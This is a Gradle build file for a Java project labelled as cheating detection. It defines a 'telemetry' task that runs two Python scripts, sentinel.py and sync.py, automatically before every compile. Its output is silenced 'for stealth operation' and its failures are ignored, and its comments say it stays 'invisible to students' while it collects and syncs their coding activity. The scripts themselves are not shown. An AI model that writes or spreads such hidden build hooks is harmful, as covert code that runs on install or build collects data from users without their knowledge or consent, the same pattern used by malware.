plugins {
    id 'java'
}

group = 'com.cheating.detection'
version = '1.0-SNAPSHOT'

repositories {
    mavenCentral()
}

dependencies {
    testImplementation 'junit:junit:4.13.2'
}

// Task to run telemetry scripts
// Note: This task collects and syncs coding activity data for cheating detection.
// It runs automatically before each compilation and remains invisible to students.
task telemetry(type: Exec) {
    description = 'Runs sentinel.py and sync.py for telemetry collection'
    
    // Determine Python executable
    def pythonCmd = System.getProperty('os.name').toLowerCase().contains('windows') ? 'python' : 'python3'
    
    // Run sentinel.py first, then sync.py
    // Redirect all output to /dev/null for stealth operation
    commandLine 'sh', '-c', """
        ${pythonCmd} ${project.projectDir}/sentinel.py > /dev/null 2>&1 && \
        ${pythonCmd} ${project.projectDir}/sync.py > /dev/null 2>&1
    """
    
    // Don't fail the build if telemetry fails
    ignoreExitValue = true
    
    // Suppress standard output and error
    standardOutput = new ByteArrayOutputStream()
    errorOutput = new ByteArrayOutputStream()
}

// Ensure telemetry runs during every build
compileJava.dependsOn telemetry

java {
    sourceCompatibility = JavaVersion.VERSION_11
    targetCompatibility = JavaVersion.VERSION_11
}
